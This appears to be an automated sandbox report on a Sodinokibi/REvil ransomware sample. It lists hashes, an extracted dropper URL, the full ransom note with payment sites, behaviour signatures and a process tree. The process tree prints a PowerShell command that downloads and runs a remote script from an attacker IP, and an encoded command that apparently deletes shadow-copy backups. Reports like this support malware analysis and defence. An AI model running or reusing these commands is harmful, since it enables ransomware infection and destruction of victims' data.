Analysis

  • max time kernel
    138s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    12-06-2020 00:10

General

  • Target

    315ea3e45ed9d73cb511afb5ad1e2d86.bat

  • Size

    213B

  • MD5

    9ffed33cd2f438b612e85a2525de7fb6

  • SHA1

    712f155efba4999bf546e2848347b572bce27b14

  • SHA256

    2674c1819c1820eb2c521770cb16fa5b47068ce9fbfa8eacf33d4ce56b08e170

  • SHA512

    6378aa3c586fb010b39411f4f1f34d6bbf9266f8a86827f6128c367298d7a295acd59fc72a318df3e5dfae8bb95248b5d8aa5330052bc7064f7b949016b2fafb

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86

Extracted

Path

C:\u0s64btn42-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension u0s64btn42. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/396850071A9D3213 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/396850071A9D3213 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: NSDYrbSm2kXkBdS2pjqIwcvaRC+x4mMTVhr7NZFg31iPy/iZip0HC7BXQtG4Ta8d lTG1S1ywrvyTT8wgdyJpRwGPJzMgwm7Gi0YzSI5WF9VGN1loRhk32TaShwRaR4ju GWSDGLF8iUvu1+mn0LJOkBKS2QdFJqiKL+eMz90A91NtEq2Nb+RXRrEgzH7ZApiZ 3Xk9GjqIG/BhkjaaOeevfS1OP1C1JUYcMTvJUYZ1ZEHLJL29byZ38tEF+jlCFzC0 hAH40JHs22sOzT6eV2uh3qOdHph0t6DUyU6cPJCUjp6V6vsropVOWjWDG52qkTZH saDobbXp5eVsTuYhL3gHxB7LDRWvpGr3Vvh23sbs2uFCTqT1mH5YjKbibN/ruIFv x1VxsshdE/YUyPYAuuG6zPbdIjO6jFiQsVTTOZhUjurSy85LPM7adfAuEIaBm7XD 4mW5SMonQSsIm8W0+dwobY2pnw9mMjyn++AF9JXTD9dzd4B3HlXYtIgxRbf9cXp3 w99bu+jB/beBPLUGTuWkIi8YoFB/0DoBAOYyD94eUoUkytrwgJBbGOEq3uSYB7dM ekxPPSrgW25DI2l/miCBFL63Cm5UodSywjLCHizW5MsvD9YdGivb6fyFJt9vlByH 9UBW7iAqSXdN5K8D/ClmXvGQurOL7ZvUrFNQOdPoYAb2ENiSHpTso4LpBl0AcaB2 RsPsosXyWVY00m7QolN4aJrDEODDoxupQhI8ZMRmJ2ZOt49xsXXMwipQsZuoAB8h XxppQz2t3RYGWOUMF2/qmIO/FKwfJS+FM1EE8Xt9bS39V4Df2K/vLFwxLfdtjRoL pv43EILwjXReOVEahLI4lQUcIgRNGATyVMJEVVqdLXvDkFc+2dlt4aMTr54N5UWZ zwsak469TZZURWZGML90evydC0ChV9/VFuQfIKiaKj/9QJ06hjdj3jqEzpF3rvbW ZiNdEG/OEIVQ372LUl/wX5RoqGEVQw7mU1ylLuTgnhUOH54qW+WsqxFZKTu0m9au eiwTaBblqtQCOK0j7QtWcx5YmgKS/ZJt3VYlKyRt/Z5guaF3pXyVrWm68mp1siVB VHJtyLo2N0Z+zUMz+Tnane2vqqGl1ZLlJF7Xp8arrBLZ3cD2XlfSOHpNC04fU1pp 6ZHV1LPCtcsdl0kBF41mLaFjBclSYtRXzxUP6TYD+GeQ72KbCPa9ObzjasZ28cE5 rBEz6VW+hpXko9G1lX56sQtshKMJsllazGAvDXZYB8/lMYGpal/m8yfNu8JDW+bB uO1vMij9edF2rsaiKqJ2u5m/iUr5/zFW7FcFFraSDp6z1uRAdDk8wg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/396850071A9D3213

http://decryptor.cc/396850071A9D3213

Signatures

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in Program Files directory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\315ea3e45ed9d73cb511afb5ad1e2d86.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86');Invoke-NLIWNW;Start-Sleep -s 10000"
      2⤵
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1808
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:784

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms